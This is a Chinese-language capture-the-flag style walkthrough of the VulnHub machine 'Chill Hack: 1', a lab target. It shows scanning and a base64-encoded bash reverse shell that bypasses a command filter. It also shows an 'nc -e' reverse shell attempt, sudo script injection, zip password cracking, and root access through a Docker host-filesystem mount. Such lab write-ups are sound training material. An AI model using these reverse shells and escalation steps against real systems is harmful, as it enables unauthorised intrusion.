Chill Hack
作者:jason_huawen
靶机信息
名称:Chill Hack: 1
地址:
https://www.vulnhub.com/entry/chill-hack-1,622/
识别目标主机IP地址
由于目标主机无法自动获取IP地址,因此参照本人另文解决该问题。
(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:fb:7c:2e 1 60 PCS Systemtechnik GmbH
192.168.56.205 08:00:27:d5:5f:8d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.205
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.205 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 05:58 EST
Nmap scan report for 192.168.56.205
Host is up (0.000089s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09f95db918d0b23a822d6e768cc20144 (RSA)
| 256 1bcf3a498b1b20b02c6aa551a88f1e62 (ECDSA)
|_ 256 3005cc52c66f6504860f7241c8a439cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Game Info
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:D5:5F:8D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.79 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ftp 192.168.56.205
Connected to 192.168.56.205.
220 (vsFTPd 3.0.3)
Name (192.168.56.205:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||10801|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 115 4096 Oct 03 2020 .
drwxr-xr-x 2 0 115 4096 Oct 03 2020 ..
-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||42392|)
150 Opening BINARY mode data connection for note.txt (90 bytes).
100% |********************************************************************************| 90 98.09 KiB/s 00:00 ETA
226 Transfer complete.
90 bytes received in 00:00 (65.44 KiB/s)
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||55210|)
550 Permission denied.
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ searchsploit vsFTPd 3.0.3
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
-
目标主机FTP允许匿名访问
-
匿名用户不允许上传文件
-
FTP服务不存在可利用的漏洞
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
-
对命令有过滤机制
-
用户名: Anurodh, Apaar
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ curl http://192.168.56.205/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.205 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ nikto -h http://192.168.56.205
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.205
+ Target Hostname: 192.168.56.205
+ Target Port: 80
+ Start Time: 2023-01-30 06:12:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 8970, size: 56d7e303a7e80, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-01-30 06:13:26 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
发现了/secret目录,可以执行命令,显然有过滤机制。(结合前面得到note.txt文件)
对命令进行base64编码可以轻松绕开过滤:
──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ echo 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjIwNi81NTU1IDA+JjEK
在/secret/页面执行以下命令:
echo
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjIwNi81NTU1IDA+Jj | base64 -d |bash
在Kali Linux成功得到目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.205] 40494
bash: cannot set terminal process group (1308): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/secret$
提权
将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,并执行脚本,其中输出结果:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ubuntu:/tmp$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
jason;/bin/bash
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
Thank you for your precious time!
www-data@ubuntu:/tmp$
也就是说可以利用命令包含活动获得另一个shell,而且是用户apaar的shell
www-data@ubuntu:/tmp$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
jason;/bin/bash
nc -e /bin/bash 192.168.56.206 6666;
Thank you for your precious time!
但是没有得到反弹回来的shell,这条路行不通。
仔细查看目录,发现了hacker.php文件
www-data@ubuntu:/var/www/files$ cat hacker.php
cat hacker.php
<html>
<head>
<body>
<style>
body {
background-image: url('images/002d7e638fb463fb7a266f5ffc7ac47d.gif');
}
h2
{
color:red;
font-weight: bold;
}
h1
{
color: yellow;
font-weight: bold;
}
</style>
<center>
<img src = "images/hacker-with-laptop_23-2147985341.jpg"><br>
<h1 style="background-color:red;">You have reached this far. </h2>
<h1 style="background-color:black;">Look in the dark! You will find your answer</h1>
</center>
</head>
</html>
www-data@ubuntu:/var/www/files$
将该图片下载到kali Linux本地
www-data@ubuntu:/var/www/files/images$ ls -alh
ls -alh
total 2.1M
drwxr-xr-x 2 root root 4.0K Oct 3 2020 .
drwxr-xr-x 3 root root 4.0K Oct 3 2020 ..
-rw-r--r-- 1 root root 2.0M Oct 3 2020 002d7e638fb463fb7a266f5ffc7ac47d.gif
-rw-r--r-- 1 root root 68K Oct 3 2020 hacker-with-laptop_23-2147985341.jpg
www-data@ubuntu:/var/www/files$ cd images
cd images
www-data@ubuntu:/var/www/files/images$ ls -alh
ls -alh
total 2.1M
drwxr-xr-x 2 root root 4.0K Oct 3 2020 .
drwxr-xr-x 3 root root 4.0K Oct 3 2020 ..
-rw-r--r-- 1 root root 2.0M Oct 3 2020 002d7e638fb463fb7a266f5ffc7ac47d.gif
-rw-r--r-- 1 root root 68K Oct 3 2020 hacker-with-laptop_23-2147985341.jpg
www-data@ubuntu:/var/www/files/images$ which python
which python
www-data@ubuntu:/var/www/files/images$ which python3
which python3
/usr/bin/python3
www-data@ubuntu:/var/www/files/images$ python3 -m http.server
python3 -m http.server
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ wget http://192.168.56.205:8000/hacker-with-laptop_23-2147985341.jpg
--2023-01-30 06:47:47-- http://192.168.56.205:8000/hacker-with-laptop_23-2147985341.jpg
Connecting to 192.168.56.205:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68841 (67K) [image/jpeg]
Saving to: ‘hacker-with-laptop_23-2147985341.jpg’
hacker-with-laptop_23-214798534 100%[=====================================================>] 67.23K --.-KB/s in 0.001s
2023-01-30 06:47:47 (48.6 MB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841]
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ls
hacker-with-laptop_23-2147985341.jpg linpeas.sh nmap_full_scan note.txt test.txt
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ stegseek hacker-with-laptop_23-2147985341.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "backup.zip".
[i] Extracting to "hacker-with-laptop_23-2147985341.jpg.out".
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ls -alh
total 836K
drwxr-xr-x 2 kali kali 4.0K Jan 30 06:48 .
drwxr-xr-x 30 kali kali 4.0K Jan 30 05:50 ..
-rw-r--r-- 1 kali kali 68K Oct 3 2020 hacker-with-laptop_23-2147985341.jpg
-rw-r--r-- 1 kali kali 750 Jan 30 06:48 hacker-with-laptop_23-2147985341.jpg.out
-rw-r--r-- 1 kali kali 748K Jan 30 06:26 linpeas.sh
-rw-r--r-- 1 root root 1.5K Jan 30 05:58 nmap_full_scan
-rw-r--r-- 1 kali kali 90 Oct 3 2020 note.txt
-rw-r--r-- 1 kali kali 0 Jan 30 06:01 test.txt
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ cat hacker-with-laptop_23-2147985341.jpg.out
PK �"CQ���i*�source_code.phpUT �w_�w_ux
���㤸,ɀw�p������ G8t27���j��@Q�����$b�$�y�H�}7+Ƥ\!u:{k�Ϡ�GmNWݹ����E��+��8��n�9Ąjj�n�@'�3�c� �n-�L��C7��d!yFɃT
o�!�C���▒�ń]ъ5,����_5�B��Z�
��JqQ�<▒�t
����y�. ԅN�H3V���r[^|�uK"�Dd�^ۉ���j,e�G�Ԟ�)���!E�����$S�_���|י<���*ن��4���_�g@N �ޖn`��1����p��{}fA��jJ1��x��{z��Z��u����L�u�I�/-"�y�=��������K�}�#]�b�
�>;T�E�xA!��]]
�+�w ����2 �*S��>}��_��=���ц�▒z�4Gr^V�_�&Y���Y����2Kf�d]�@���+��¥T��z_�G����G�9�-��]h� ��gG
�4Y�j_�fGo��?O(������O�(��9=#=���P���i*�PK �"CQ���i*�▒��source_code.phpUT�w_ux
PKU�
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ file hacker-with-laptop_23-2147985341.jpg.out
hacker-with-laptop_23-2147985341.jpg.out: Zip archive data, at least v2.0 to extract, compression method=deflate
发现zip文档被加密:
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ unzip hacker-with-laptop_23-2147985341.jpg.out
Archive: hacker-with-laptop_23-2147985341.jpg.out
[hacker-with-laptop_23-2147985341.jpg.out] source_code.php password:
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ file hacker-with-laptop_23-2147985341.jpg.out
hacker-with-laptop_23-2147985341.jpg.out: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ unzip hacker-with-laptop_23-2147985341.jpg.out
Archive: hacker-with-laptop_23-2147985341.jpg.out
[hacker-with-laptop_23-2147985341.jpg.out] source_code.php password:
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ zip2john hacker-with-laptop_23-2147985341.jpg.out > hashes
ver 2.0 efh 5455 efh 7875 hacker-with-laptop_23-2147985341.jpg.out/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word (hacker-with-laptop_23-2147985341.jpg.out/source_code.php)
1g 0:00:00:00 DONE (2023-01-30 06:52) 25.00g/s 307200p/s 307200c/s 307200C/s total90..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ unzip hacker-with-laptop_23-2147985341.jpg.out
Archive: hacker-with-laptop_23-2147985341.jpg.out
[hacker-with-laptop_23-2147985341.jpg.out] source_code.php password:
inflating: source_code.php
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ls
hacker-with-laptop_23-2147985341.jpg hashes nmap_full_scan source_code.php
hacker-with-laptop_23-2147985341.jpg.out linpeas.sh note.txt test.txt
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ cat source_code.php
<html>
<head>
Admin Portal
</head>
<title> Site Under Development ... </title>
<body>
<form method="POST">
Username: <input type="text" name="name" placeholder="username"><br><br>
Email: <input type="email" name="email" placeholder="email"><br><br>
Password: <input type="password" name="password" placeholder="password">
<input type="submit" name="submit" value="Submit">
</form>
<?php
if(isset($_POST['submit']))
{
$email = $_POST["email"];
$password = $_POST["password"];
if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
{
$random = rand(1000,9999);?><br><br><br>
<form method="POST">
Enter the OTP: <input type="number" name="otp">
<input type="submit" name="submitOtp" value="Submit">
</form>
<?php mail($email,"OTP for authentication",$random);
if(isset($_POST["submitOtp"]))
{
$otp = $_POST["otp"];
if($otp == $random)
{
echo "Welcome Anurodh!";
header("Location: authenticated.php");
}
else
{
echo "Invalid OTP";
}
}
}
else
{
echo "Invalid Username or Password";
}
}
?>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ echo 'IWQwbnRLbjB3bVlwQHNzdzByZA==' | base64 -d
!d0ntKn0wmYp@ssw0rd
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$
这个密码应该是某个用户的密码,进行尝试:
www-data@ubuntu:/home$ su apaar
su apaar
su: must be run from a terminal
www-data@ubuntu:/home$ which python3
which python3
/usr/bin/python3
www-data@ubuntu:/home$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/home$ su - apaar
su - apaar
Password: !d0ntKn0wmYp@ssw0rd
su: Authentication failure
www-data@ubuntu:/home$ su - anurodh
su - anurodh
Password: !d0ntKn0wmYp@ssw0rd
anurodh@ubuntu:~$
发现可以成功切换到用户anurodh
anurodh@ubuntu:~$ sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: jason
Hello user! I am jason, Please enter your message: cat /home/apaar/local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
Thank you for your precious time!
anurodh@ubuntu:~$
anurodh@ubuntu:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-01-30 20:02:31-- http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’
alpine-v3.13-x86_64-20210218_01 100%[=====================================================>] 3.11M --.-KB/s in 0.01s
2023-01-30 20:02:31 (316 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]
anurodh@ubuntu:/tmp$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz
systemd-private-cd83df7cbc904717a343517ce0048a1b-apache2.service-dQSd3y
systemd-private-cd83df7cbc904717a343517ce0048a1b-systemd-resolved.service-pl5JTK
systemd-private-cd83df7cbc904717a343517ce0048a1b-systemd-timesyncd.service-szZW26
anurodh@ubuntu:/tmp$
利用aunurodh是docker组成员进行root提权
anurodh@ubuntu:/tmp$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
alpine latest a24bb4013296 2 years ago 5.57MB
hello-world latest bf756fb1ae65 3 years ago 13.3kB
anurodh@ubuntu:/tmp$ docker run -v /:/mnt -it alpine
/ # cd /mnt
/mnt # ls -alh
total 2G
drwxr-xr-x 24 root root 4.0K Oct 3 2020 .
drwxr-xr-x 1 root root 4.0K Jan 30 20:05 ..
drwxr-xr-x 2 root root 4.0K Oct 3 2020 bin
drwxr-xr-x 4 root root 4.0K Oct 3 2020 boot
drwxr-xr-x 2 root root 4.0K Oct 3 2020 cdrom
drwxr-xr-x 19 root root 3.8K Jan 30 18:56 dev
drwxr-xr-x 97 root root 4.0K Oct 4 2020 etc
drwxr-xr-x 5 root root 4.0K Oct 3 2020 home
lrwxrwxrwx 1 root root 34 Oct 3 2020 initrd.img -> boot/initrd.img-4.15.0-118-generic
lrwxrwxrwx 1 root root 34 Oct 3 2020 initrd.img.old -> boot/initrd.img-4.15.0-118-generic
drwxr-xr-x 22 root root 4.0K Oct 3 2020 lib
drwxr-xr-x 2 root root 4.0K Aug 6 2020 lib64
drwx------ 2 root root 16.0K Oct 3 2020 lost+found
drwxr-xr-x 2 root root 4.0K Aug 6 2020 media
drwxr-xr-x 2 root root 4.0K Aug 6 2020 mnt
drwxr-xr-x 3 root root 4.0K Oct 3 2020 opt
dr-xr-xr-x 197 root root 0 Jan 30 10:56 proc
drwx------ 7 root root 4.0K Jan 30 18:54 root
drwxr-xr-x 30 root root 1000 Jan 30 19:58 run
drwxr-xr-x 2 root root 12.0K Oct 3 2020 sbin
drwxr-xr-x 2 root root 4.0K Oct 3 2020 snap
drwxr-xr-x 3 root root 4.0K Oct 3 2020 srv
-rw------- 1 root root 2.0G Oct 3 2020 swap.img
dr-xr-xr-x 13 root root 0 Jan 30 18:56 sys
drwxrwxrwt 10 root root 4.0K Jan 30 20:05 tmp
drwxr-xr-x 11 root root 4.0K Oct 3 2020 usr
drwxr-xr-x 14 root root 4.0K Oct 3 2020 var
lrwxrwxrwx 1 root root 31 Oct 3 2020 vmlinuz -> boot/vmlinuz-4.15.0-118-generic
lrwxrwxrwx 1 root root 31 Oct 3 2020 vmlinuz.old -> boot/vmlinuz-4.15.0-118-generic
/mnt # cd root
/mnt/root # ls -alh
total 72K
drwx------ 7 root root 4.0K Jan 30 18:54 .
drwxr-xr-x 24 root root 4.0K Oct 3 2020 ..
-rw------- 1 root root 0 Oct 4 2020 .bash_history
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Oct 3 2020 .cache
drwx------ 3 root root 4.0K Oct 3 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Jan 30 18:54 .local
-rw------- 1 root root 370 Oct 4 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 12.0K Oct 4 2020 .proof.txt.swp
drwx------ 2 root root 4.0K Oct 3 2020 .ssh
drwxr-xr-x 2 root root 4.0K Oct 3 2020 .vim
-rw------- 1 root root 11.4K Oct 4 2020 .viminfo
-rw-r--r-- 1 root root 166 Oct 3 2020 .wget-hsts
-rw-r--r-- 1 root root 1.4K Oct 4 2020 proof.txt
/mnt/root # cat proof.txt
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}
Congratulations! You have successfully completed the challenge.
,-.-. ,----. _,.---._ .-._ ,----.
,-..-.-./ \==\ ,-.--` , \ _.-. _.-. _,..---._ ,-.' , - `. /==/ \ .-._ ,-.--` , \
|, \=/\=|- |==||==|- _.-` .-,.'| .-,.'| /==/, - \ /==/_, , - \|==|, \/ /, /==|- _.-`
|- |/ |/ , /==/|==| `.-.|==|, | |==|, | |==| _ _\==| .=. |==|- \| ||==| `.-.
\, , _|==/==/_ , /|==|- | |==|- | |==| .=. |==|_ : ;=: - |==| , | -/==/_ , /
| - - , |==|==| .-' |==|, | |==|, | |==|,| | -|==| , '=' |==| - _ |==| .-'
\ , - /==/|==|_ ,`-._|==|- `-._|==|- `-._ |==| '=' /\==\ - ,_ /|==| /\ , |==|_ ,`-._
|- /\ /==/ /==/ , //==/ - , ,/==/ - , ,/ |==|-, _`/ '.='. - .' /==/, | |- /==/ , /
`--` `--` `--`-----`` `--`-----'`--`-----' `-.`.____.' `--`--'' `--`./ `--`--`-----``
--------------------------------------------Designed By -------------------------------------------------------
| Anurodh Acharya |
---------------------
Let me know if you liked it.
Twitter
- @acharya_anurodh
Linkedin
- www.linkedin.com/in/anurodh-acharya-b1937116a
/mnt/root #
经验教训
-
.helpline.sh脚本在通过反弹shell得到的shell中执行有些问题,此时应该考虑有无其他途径。
-
得到用户的密码,应该及时登录SSH,Shell更加稳定。